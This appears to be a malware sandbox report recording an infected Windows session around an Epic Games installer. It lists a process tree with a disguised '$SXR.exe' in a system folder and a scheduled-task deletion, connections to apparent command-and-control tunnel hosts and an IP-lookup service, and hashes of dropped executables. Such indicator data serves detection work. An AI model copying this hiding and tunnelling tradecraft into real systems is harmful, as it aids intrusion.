"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6420 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB6DC.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB6DD.tmp.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5048 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5044 /prefetch:8
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\EpicInstaller-15.17.1.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 924D515C8C5C1008656DF2EB325504D2 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3B12.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240663328 5 CustomActionManaged!CustomActionManaged.CustomActions.ValidatePathLength
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C1C3FA90631C86EC8E5B4BF27B89411A
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI42E1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240665312 10 CustomActionManaged!CustomActionManaged.CustomActions.TelemetrySendStart
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1672 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI7982.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240679328 16 CustomActionManaged!CustomActionManaged.CustomActions.SetStartupCmdlineArgs
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI8B95.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240683921 22 CustomActionManaged!CustomActionManaged.CustomActions.CheckReparsePoints
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6172 /prefetch:2
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 11AD163BF921D21355349AEC163E6361 E Global\MSI0000
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI57D0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240736312 31 CustomActionManaged!CustomActionManaged.CustomActions.MoveChainerToFolder
C:\Program Files (x86)\Epic Games\DirectXRedist\DXSETUP.exe
"C:\Program Files (x86)\Epic Games\DirectXRedist\DXSETUP.exe" /silent
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 169.128.123.92.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.180:443 | th.bing.com | tcp |
| GB | 92.123.128.180:443 | th.bing.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 149.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 104.18.41.55:443 | www.epicgames.com | tcp |
| US | 104.18.41.55:443 | www.epicgames.com | tcp |
| US | 104.18.41.55:443 | www.epicgames.com | tcp |
| US | 8.8.8.8:53 | store.epicgames.com | udp |
| US | 104.18.33.131:443 | store.epicgames.com | tcp |
| US | 104.18.33.131:443 | store.epicgames.com | tcp |
| US | 8.8.8.8:53 | 55.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | cdn1.unrealengine.com | udp |
| US | 8.8.8.8:53 | components.unrealengine.com | udp |
| US | 8.8.8.8:53 | cdn2.unrealengine.com | udp |
| US | 8.8.8.8:53 | static-assets-prod.epicgames.com | udp |
| US | 8.8.8.8:53 | epic-social-social-modules-prod.ol.epicgames.com | udp |
| GB | 18.245.143.114:443 | components.unrealengine.com | tcp |
| GB | 18.245.143.114:443 | components.unrealengine.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 18.244.114.120:443 | epic-social-social-modules-prod.ol.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| US | 8.8.8.8:53 | 131.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tracking.epicgames.com | udp |
| US | 3.228.148.160:443 | tracking.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| US | 8.8.8.8:53 | 160.148.228.3.in-addr.arpa | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 236.131.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | launcher-public-service-prod06.ol.epicgames.com | udp |
| GB | 18.245.253.95:443 | launcher-public-service-prod06.ol.epicgames.com | tcp |
| GB | 18.245.253.95:443 | launcher-public-service-prod06.ol.epicgames.com | tcp |
| US | 8.8.8.8:53 | epicgames-download1.akamaized.net | udp |
| GB | 104.77.160.220:443 | epicgames-download1.akamaized.net | tcp |
| US | 8.8.8.8:53 | 95.253.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | media.graphassets.com | udp |
| US | 151.101.2.133:443 | media.graphassets.com | tcp |
| US | 151.101.2.133:443 | media.graphassets.com | tcp |
| US | 8.8.8.8:53 | 133.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | epicgames-privacy.my.onetrust.com | udp |
| US | 104.18.32.137:443 | epicgames-privacy.my.onetrust.com | tcp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| N/A | 127.0.0.1:53119 | tcp | |
| N/A | 127.0.0.1:53121 | tcp | |
| US | 8.8.8.8:53 | cdn2.epicgames.com | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 104.18.33.131:443 | store.epicgames.com | tcp |
| US | 104.18.33.131:443 | store.epicgames.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.64:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | datarouter.ol.epicgames.com | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 34.198.112.205:443 | datarouter.ol.epicgames.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.112.198.34.in-addr.arpa | udp |
| US | 52.111.229.19:443 | tcp | |
| N/A | 127.0.0.1:53164 | tcp | |
| N/A | 127.0.0.1:53166 | tcp | |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:52092 | tcp | |
| N/A | 127.0.0.1:52094 | tcp | |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 8e2e864d1a14aa04d89af412d939a35a |
| SHA1 | efd5eb845b6344ce3f83555b2e65ad637dc54968 |
| SHA256 | 958cb8589a2270621595a4aeaa1c25b49b5c5b3d6c58d49f9e71ee4cd7c5a086 |
| SHA512 | 63f800e4df231e2aca790e689273b0ec77f54401bf14aeb97f6ea2ccee595a377b846ae117b42ba9429f33ef6a45dcd66cedd63adf84a032ae6e88329baf9092 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3508cbbaaec769b7a46c164d58ab95d1 |
| SHA1 | 4a6fe963148ca15143c2f93c95413ae6e6f36ed1 |
| SHA256 | b4fa915ecf2aa7ad2bff910cb777407495a5781c4632592262f45c6e109b147a |
| SHA512 | ccbdb59567a076e58e68010ed69d196d2602e83abb5363c590ee5f6722efaa58746bd1f3921835007d202d0f9fdf49fa91ad96c472c745099cf813eb0b03a499 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | ec74d9141eae157c1d88b02b2b8f5c82 |
| SHA1 | bd75c4871c2514d30b163e5dcb6db4e0ab310e53 |
| SHA256 | a5a19888c10cf73591cc62a648c1bf4ee85cf697f1b048f912f2a0083fc122c2 |
| SHA512 | 4d0e80d05f96f340b961ce7be4df4f33c9af97c61ba2508a02f872b215118a3bbb66018f267dc576bca731e2ffd2d0c1d8734f48b26bb5632686cab10eece55e |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 9f96e206fdde0bf0048f34bbd0b29110 |
| SHA1 | a29ab81b1f34c2b3046d312edc4ebcd3da47ba3c |
| SHA256 | 5795509378238af4a5a43f75670a160fc184826f5ac947a2fa85c7db33bdebd6 |
| SHA512 | 69bb9e2198878c7066a9cd448c071064a5b02a19308da5bb514ee7d445a55128c751494b1711172883a4f7f212d12154784c3b0e75a0e27e0ea016a7d64ab42e |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 9c0688cd168413fbc4f677854c5cd648 |
| SHA1 | ad8ec9f6a7f0510023ba17ba55506b7487d949b8 |
| SHA256 | 1d5954867e46c92d84461e66326e1428d2b95f404453dcf647f42179f1235f42 |
